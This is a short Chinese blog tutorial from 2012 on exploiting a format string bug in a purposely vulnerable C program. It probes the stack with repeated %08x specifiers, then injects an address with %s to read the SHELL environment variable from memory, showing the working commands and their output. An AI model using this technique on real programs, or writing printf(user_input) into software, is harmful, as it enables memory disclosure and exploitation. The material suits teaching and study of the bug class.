格式串攻击

漏洞目标代码:

//fmtstr.c
#include<stdlib.h>
int main(int argc,char *argv[]){
  static int canary=0;
  char temp[2048];
  strcpy(temp,argv[1]);
  printf(temp);
  printf("\n");
  printf("Canary at 0x%08x=0x%08x\n",&canary,canary);
}

 可以看出,漏洞代码允许用户指定printf的格式串,可自行构造

[root@Lynx gray]# ./fmtstr "AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x"
AAAA bffffa1a 00000200 464c457f 00010101 00000000 00000000 00030003 00000001 004eff0a 41414141

一直增加%08x,直到出现414141,也就是AAAA所在的栈的位置

当把最后一个%08x换成%s后会出现“段错误”

主要是%s试图读取内存的位置,用该位置的数据作为指针,指向别处,此处指向地址41414141,超出内存范围,所以会报错,由此可知,只要把这个地方换成任意正确的地址,就可以读取出这里保存的数据内容,也就是把"AAAA"替换成合法的内存地址。

获得某一环境变量的指针的辅助程序代码

//getenv.c
#include<stdlib.h>
int main(int argc,char *argv[])
{
  char *addr;
  addr=getenv(argv[1]);
  printf("%s is located at %p\n",argv[1],addr);
}

 [root@Lynx gray]# ./getenv SHELL
SHELL is located at 0xbffffa8c

可以看到保存SHELL的位置信息了,想获得具体内容吗?

[root@Lynx gray]# ./fmtstr `printf "\x8c\xfa\xff\xbf"`" %08x %08x %08x %08x %08x %08x %08x %08x %08x %s"  bffffa1c 00000200 464c457f 00010101 00000000 00000000 00030003 00000001 004eff0a /bin/bash

其中"/bin/bash"就是"0xbffffa8c"这个地址的内容,获得了SHELL环境变量的内容。

posted @ 2012-12-21 10:57  山貓  阅读(477)  评论(0编辑  收藏  举报